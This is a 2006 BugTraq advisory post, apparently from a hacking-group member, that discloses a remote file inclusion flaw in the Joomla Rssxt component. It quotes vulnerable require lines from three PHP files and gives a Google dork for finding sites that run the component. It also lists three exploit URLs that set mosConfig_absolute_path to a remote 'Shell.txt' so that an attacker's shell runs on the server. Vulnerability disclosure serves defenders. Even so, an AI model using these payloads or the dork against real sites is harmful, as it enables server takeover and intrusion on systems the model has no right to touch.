BugTraq
Joomla Rssxt <= 1.0 Remote File Include Vulnerability Aug 18 2006 09:46AM
crackers_child sibersavascilar com (1 replies)
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : Joomla Rssxt <= 1.0 Remote File Include Vulnerability

------------------------------------------------------------------------
--------

#Author: Crackers_Child

#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]

------------------------------------------------------------------------
--------

Google Dorks : allinurl:"/com_rssxt/"

------------------------- -------------------------------------------------------

Download : http://mamboxchange.com/frs/shownotes.php?release_id=985

------------------------------------------------------------------------
--------

Bug

in pinger.php

require("../../configuration.php");

require("../../classes/mambo.php");

require("../../includes/sef.php");

require("$mosConfig_absolute_path/administrator/components/com_rssxt/cla
ss.rssxt.php");

error_reporting(0);

require("../../includes/IXR_Library.inc.php");

---

in RPC.php

require("../../configuration.php");

require("$mosConfig_absolute_path/classes/mambo.php");

require("$mosConfig_absolute_path/includes/sef.php");

require("$mosConfig_absolute_path/administrator/components/com_rssxt/cla
ss.rssxt.php");

require("includes/blogger.php");

require("includes/metaweblog.php");

error_reporting(0);

require("$mosConfig_absolute_path/includes/IXR_Library.inc.php");

--

rssxt.php

include($mosConfig_absolute_path."/components/com_rssxt/includes/feedcre
ator.class.php");

require_once( $mosConfig_absolute_path."/administrator/components/com_rssxt/class.rssx
t.php");

------------------------------------------------------------------------
--------

Exploit:

http://www.site.com/joomla_path/components/com_rssxt/pinger.php?mosConfi
g_absolute_path=Shell.txt?

http://www.site.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_a
bsolute_path=Shell.txt?

http://www.site.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig
_absolute_path=Shell.txt?

------------------------------------------------------------------------
--------

greets:

All My Friends And SiberSavascilar.Com Members !

------------------------------------------------------------------------
--------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------

[ reply ]
Re: Joomla Rssxt <= 1.0 Remote File Include Vulnerability Aug 18 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)


 

Privacy Statement
Copyright 2010, SecurityFocus